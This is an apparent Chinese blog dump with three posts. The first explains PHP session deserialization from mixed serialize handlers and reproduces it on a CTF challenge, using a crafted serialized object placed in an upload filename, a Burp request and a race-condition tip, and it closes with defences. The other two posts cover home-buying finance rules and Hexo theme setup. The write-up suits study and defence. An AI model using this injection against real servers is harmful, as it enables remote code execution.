php session在服务端是需要存储的，存储介质一般是file，存储就会涉及到序列化/反序列化，当序列化/反序列化处理器混用的情况就有可能出现问题，特别是在存储时使用php_serialize处理器，读取时使用php处理器，就很有可能会有问题，实际场景并不多，今天作为一种漏洞类型学习一下，大部分都是学习网上的思路，自己实践遇到了一些坑点。

原理

php session反序列化的定义

什么是php session反序列化，当php开启会话(session_start)的时候，php会从对应session文件中读取数据将其反序列化到$_SESSION，同样地，当会话关闭时，php会把$_SESSION里面的数据序列化存入session文件，php内置了多种处理器用于存取$_SESSION数据，常用的有以下三种不同的处理格式：

| 处理器 | 对应的存储格式 | 示例（序列化串） | 备注 | | ------------------------- | ------------------------------------------------------------ | ------------------ | ---------------------------------------------------- | | php | 键名＋竖线＋经过 serialize() 函数反序列处理的值 | a\|i:2; | | | php_binary | 键名的长度对应的 ASCII 字符＋键名＋经过 serialize() 函数反序列处理的值 | ^Aai:2; | ^A为一个字符，
通过hexdump -C查看其十六进制为01 | | php_serialize(php>=5.5.4) | 经过 serialize() 函数反序列处理的数组 | a:1:{s:1:"a";i:2;} | |

示例结果为$_SESSION['a'] = 2的序列化串，可使用如下代码测试得到，


ini_set('session.serialize_handler', 'php_serialize');
session_start();
$_SESSION['a'] = 2;
session_write_close();

我使用oneinstack安装php之后显示的默认处理器是php不是php_serialize，应该是oneinstack对其进行了修改

产生的原理

漏洞产生的原理就是在用session.serialize_handler = php_serialize存储的字符可以引入|, 再用session.serialize_handler = php格式取出session文件内容时，|会被当成键值对的分隔符，在特定的地方会造成反序列化漏洞，具体可参见漏洞复现部分。

涉及的php.ini配置项

默认情况下session.upload_progress.cleanup的值为On，我们目前暂时手动修改为Off，以便保证在脚本开始运行时上传进度相关的session信息依然存在，在该选项为On的情况下可以利用竞态条件来实现session信息的反序列化，关于该配置项的解释，可参见php官方文档。

Note that if you run that code and you print out the content of $_SESSSION[$key] you get an empty array due that session.upload_progress.cleanup is on by default and it cleans the progress information as soon as all POST data has been read.
Set it to Off or 0 to see the content of $_SESSION[$key].

复现

http://web.jarvisoj.com:32784/index.php ，复制该题的源码存入session_unserialize.php，它在开头使用了ini_set('session.serialize_handler', 'php');而php.ini中session.serialize_handler配置为php_serialize，故可能存在php session反序列化漏洞，而恰好有类OowoO存在eval危险函数，此危险函数同时又在类OowoO的__destruct()中，于是我们使用如下代码构造序列化串以显示文件所在目录


class OowoO
{
    public $mdzz='print_r(dirname(__FILE__));';
}
$obj = new OowoO();
$a = serialize($obj);

var_dump($a);

输出结果：
'O:5:"OowoO":1:{s:4:"mdzz";s:27:"print_r(dirname(__FILE__));";}'

在输出结果前面加上|，然后想办法作为$_SESSION的某个键值使用php_serialize处理器序列化到session文件中，然后再从session文件中使用php处理器反序列化出来，那么漏洞就会产生。
反序列化的漏洞文件session_unserialize.php已经有了，下一步重点是我们要想办法把序列化串存到$_SESSION中，这时就要用到php.ini的配置项sesssion.upload_progress.enabled=On，默认为开启状态，查看php官方文档https://www.php.net/manual/en/session.upload-progress.php

The upload progress will be available in the $_SESSION superglobal when an upload is in progress, and when POSTing a variable of the same name as the session.upload_progress.name INI setting is set to. When PHP detects such POST requests, it will populate an array in the $_SESSION, where the index is a concatenated value of the session.upload_progress.prefix and session.upload_progress.name INI options. The key is typically retrieved by reading these INI settings, i.e.

也就是说当开启上传进度查看时，如果发送一个POST请求，POST请求中有个参数的名称是session.upload_progress.name的值（一般是PHP_SESSION_UPLOAD_PROGRESS），那么后端会在$_SESSION超全局数组里面记录上传进度用以返回给前端，具体$_SESSION超全局数组里面会存储什么，下面也有介绍，也可以自行写代码测试进行查看，

Example of the structure of the progress upload array.


 " value="123" />
 
 
 
</form>

The data stored in the session will look like this:


$_SESSION["upload_progress_123"] = array(
 "start_time" => 1234567890,   // The request time
 "content_length" => 57343257, // POST content length
 "bytes_processed" => 453489,  // Amount of bytes received and processed
 "done" => false,              // true when the POST handler has finished, successfully or not
 "files" => array(
  0 => array(
   "field_name" => "file1",       // Name of the  field
   // The following 3 elements equals those in $_FILES
   "name" => "foo.avi",
   "tmp_name" => "/tmp/phpxxxxxx",
   "error" => 0,
   "done" => true,                // True when the POST handler has finished handling this file
   "start_time" => 1234567890,    // When this file has started to be processed
   "bytes_processed" => 57343250, // Number of bytes received and processed for this file
  ),
  // An other file, not finished uploading, in the same request
  1 => array(
   "field_name" => "file2",
   "name" => "bar.avi",
   "tmp_name" => NULL,
   "error" => 0,
   "done" => false,
   "start_time" => 1234567899,
   "bytes_processed" => 54554,
  ),
 )
);

值得一提的是这种情况下，$_SESSION超全局数组里面会存储$_FILES超全局数组里面的一些信息，最为关键的是file name和file temp name，我们就借助file name来把序列化串写入到$_SESSION中，构造html请求表单

html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>php session unserialize exampletitle>
head>
<body>
<form action="http://localhost/vuln/session_unserialize.php" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
    <input type="file" name="file" />
    <input type="submit" />
form>
body>
html>

随意提交文件上传，burp拦截改包如下，

POST /vuln/session_unserialize.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1314365402189625052536245878
Content-Length: 424
Referer: http://localhost/vuln/session_unserialize.html
Cookie: PHPSESSID=9nhpcsuogisgjnmfm5e3gqri43; XDEBUG_SESSION=PHPSTORM
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

-----------------------------1314365402189625052536245878
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

123
-----------------------------1314365402189625052536245878
Content-Disposition: form-data; name="file"; filename="|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:27:\"print_r(dirname(__FILE__));\";}"
Content-Type: application/octet-stream


-----------------------------1314365402189625052536245878--

因为HTTP包Cookie中带有XDEBUG_SESSION=PHPSTORM，故burp发包也会触发PHPSTORM调试机制，该包我们调试一下，

此时session文件内容如下

1
2
3

# xiaopo @ fht in ~/grayguest.github.io on git:writing x [22:02:34] 
$ sudo cat /tmp/sess_9nhpcsuogisgjnmfm5e3gqri43
a:2:{s:1:"a";i:2;s:19:"upload_progress_123";a:5:{s:10:"start_time";i:1594216960;s:14:"content_length";i:424;s:15:"bytes_processed";i:424;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:63:"|O:5:"OowoO":1:{s:4:"mdzz";s:27:"print_r(dirname(__FILE__));";}";s:8:"tmp_name";s:14:"/tmp/php5ueiZ3";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1594216960;s:15:"bytes_processed";i:424;}}}}%

此时还未更改反序列化处理器，所以$_SESSION数组比较正常，有的人可能会问，session_start()还没开始，怎么数据已经反序列化到$_SESSION数组中了呢，这可能是因为session.auto_start = on，具体session.auto_start的解释可参见https://github.com/80vul/phpcodz/blob/master/research/pch-013.md，

配置选项 session.auto_start＝On，会自动注册 Session 会话，因为该过程是发生在脚本代码执行前，所以在脚本中设定的包括序列化处理器在内的 session 相关配选项的设置是不起作用的，因此一些需要在脚本中设置序列化处理器配置的程序会在 session.auto_start＝On 时，销毁自动生成的 Session 会话，然后设置需要的序列化处理器，再调用 session_start() 函数注册会话

但是我的php.ini中session.auto_start配置为off，那又会是其他什么原因呢，猜测可能和上传过程有关系，先不管它，往下单步，

此时已经更改反序列化处理器为php，故会使用php处理器进行反序列化后存入$_SESSION，于是危险类被触发，返回当前路径，待执行完毕，session文件内容如下，

1
2
3

# xiaopo @ fht in ~/grayguest.github.io on git:writing x [22:02:53] 
$ sudo cat /tmp/sess_9nhpcsuogisgjnmfm5e3gqri43
a:1:{s:19:"upload_progress_123";a:5:{s:10:"start_time";i:1594217096;s:14:"content_length";i:424;s:15:"bytes_processed";i:424;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:63:"|O:5:"OowoO":1:{s:4:"mdzz";s:27:"print_r(dirname(__FILE__));";}%

利用竞态条件来实现session信息的反序列化

https://xz.aliyun.com/t/6640#toc-10 ，panda师傅的这篇文章最后的实例，关于“由于请求后，session会立刻被清空覆盖，因此需要不断发送请求，这里可以写脚本，也可以直接利用burp ，我偷个懒直接利用 burp ：”我理解session之所以会被清空是因为session.upload_progress.cleanup为On，按道理它在php文件运行前就已经被清空了，后来得知panda师傅是利用竞态条件来实现的，然后我尝试burp发包1000次也没能写入文件，刚开始不知道可能是什么原因，

后来把burp intruder线程调到50，成功反序列化，另外注意web权限要有写本地文件权限。

防御

统一使用相同的处理器做序列化/反序列化，比如php_serialize。
当使用php处理器做反序列化时，必须保证不和php_serialize处理器混用。

参考链接

买房相关知识汇总

2020-05-25T10:36:55.000Z

最近准备买房，各种凑钱，整得焦头烂额，一辈子就为了个栖身之所，相关的政策也要了解，特别是二手房交易流程复杂风险多，需要多多了解，现记录一下以备用。

新房 vs. 二手房

火眼金晴

家电

空调外机，空调外机噪音。
房产证
房产证有大房产证（集体产权）、小房产证

公积金贷款

济南公积金贷款条件及额度
条件：
济南户口
连续6个月缴纳住房公积金（不限地点，北京缴纳亦可），且正常缴存状态
额度：
主借款人的借款额度可以与配偶合并，配偶自动成为共同还款人，两人须同时连续6个月缴纳住房公积金。
北京公积金提取政策
异地买房提取：
买了房子之后，购房合同，贷款证明，一次性全部提取（需剩余10块钱）。
异地还贷提取：
最快每一个季度办理提取，其他可全部提取（需剩余10块钱）。
济南公积金提取政策
工

Q & A

非济南户口，在济南买房，使用北京公积金能否申请济南购房的公积金贷款？
必须得是济南户口，配偶是济南户口的可以作为主借款人，另一方作为共同还款人。
连续6个月，我现在离职又工作中间断了一个月有没有办法代缴或补缴？
北京每月公积金能否直接还济南房贷的月供？
不能异地还，只能依据公积金缴存地（如北京）的提取政策，能否按月提取公积金。

参考链接：

1万元个人住房公积金贷款及商业贷款等额本息还款方式计算表
http://gjj.jinan.gov.cn/col/col11481/index.html

hexo主题配置与修改

2020-05-21T22:47:09.000Z

最近把博客换到了github pages上面，使用hexo作为静态页面生成的工具，hexo自带主题比较丑，于是搜索自己比较喜欢简洁、小众风格，最后选中了https://github.com/wayou/hexo-theme-material 这个hexo主题，我们需要对这个主题做一些配置和修改，因为这个主题本身不提供文章分类和标签的功能，记录一下摸索的过程。

配置与修改

选择语言包

修改hexo中的_config.yml文件

1	language: zh-CN

主题languages文件夹下zh-CN.yml文件中需要补充以下两个字段

1 2	archive_a: 归档 archive_b: "归档: %s"

其中archive_a用来显示点击菜单中“归档”时的页面title

编辑首页

编辑主题中的_config.yml文件，而非hexo中的_config.yml文件

修改”存档“为”归档“
注释菜单中”RSS“
修改links:
增加以下两个widgets

1 2	- category - tag

其中category用于显示文章分类，tag用于显示标签。

生成页面

生成分类页面

1	hexo new page categories

将 source/categories/index.md 的内容修改为如下：

---
title: 分类
date: 2020-05-21 22:00:00
type: "categories"
comments: false
---

生成标签页面

1	hexo new page tags

将 source/tags/index.md 的内容修改为如下：

---
title: 标签
date: 2020-05-21 22:00:00
type: "tags"
comments: false
---

生成 about 关于我页面

1	hexo new page about

将 source/about/index.md 的内容修改为如下：

---
title: 关于我
type: "about"
date: 2020-05-21 22:00:00
comments: false
---

关于你的描述......

安装favicon.icon

在https://favicon.io/favicon-generator/ 网站上面制作，制作完成之后上面也有引入方式

<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">

修改/home/xiaopo/grayguest.github.io/docs/themes/material/layout/_partial/head.ejs中的内容符合上面的引入方式即可

修改颜色

全局修改，目前没找到方法。

修改More…

article.ejs，修改如下代码：

1	"> More... </a>

为

1	"> 阅读更多... </a>

修改移动端兼容性

该主题在移动端，实际测试所用手机为iphone se2 13.5.1+safari，对于代码高亮有左右滚动条的展示，代码会显示不全，需要修改material主题source/css/highlight.css和highlight.light.css这2个文件中的.highlight pre {}和figure.highlight pre部分，具体将以下

.highlight pre {
  border: none;
  margin: 0;
  padding: 0;
}

更改为

.highlight pre {
  border: none;
  margin: 0;
  /* padding: 0; */
  padding-top: 0;
  padding-bottom: 0;
  padding-left: 0;
  white-space: pre;
}

增加分类

前面已经通过hexo new page categories生成分类页面，拷贝landscape主题的layout/category.ejs到material主题的同级目录，拷贝landscape主题的layout/_partial/post文件夹到material主题的同级目录，编辑material主题layout/_widget\category.ejs

<% if (site.categories.length){ %>

<%= __('categories') %></h4>

<% site.categories.sort('name').each(function(item){ %>

            <%- item.path %>"></i><%= item.name %></a>
            </li>
<% }); %>
</ul>
</div>
<% } %>

增加标签

前面已经通过hexo new page tags生成标签页面，拷贝landscape主题的layout/tag.ejs到material主题的同级目录，编辑material主题layout/_widget\tag.ejs

<% if (site.tags.length){ %>
  
    <%= __('tags') %></h4>
    
      <% site.tags.each(function(tag){ %>
        
          <%= tag.path %>" > </i><%= tag.name%></a>
        </li>
      <% }); %>
    </ul>
  </div>
<% } %>

增加版权说明

article.ejs文件的post部分增加，

1
2
3

<% if (page.path != 'about/index.html' && theme.copyright.enable){ %>
<%- partial('copyright') %>
<% } %>

发现about部分也会显示版权说明，about处的pageType竟然是post？？？

增加主题layout/_partial/copyright.ejs文件

峰焕亭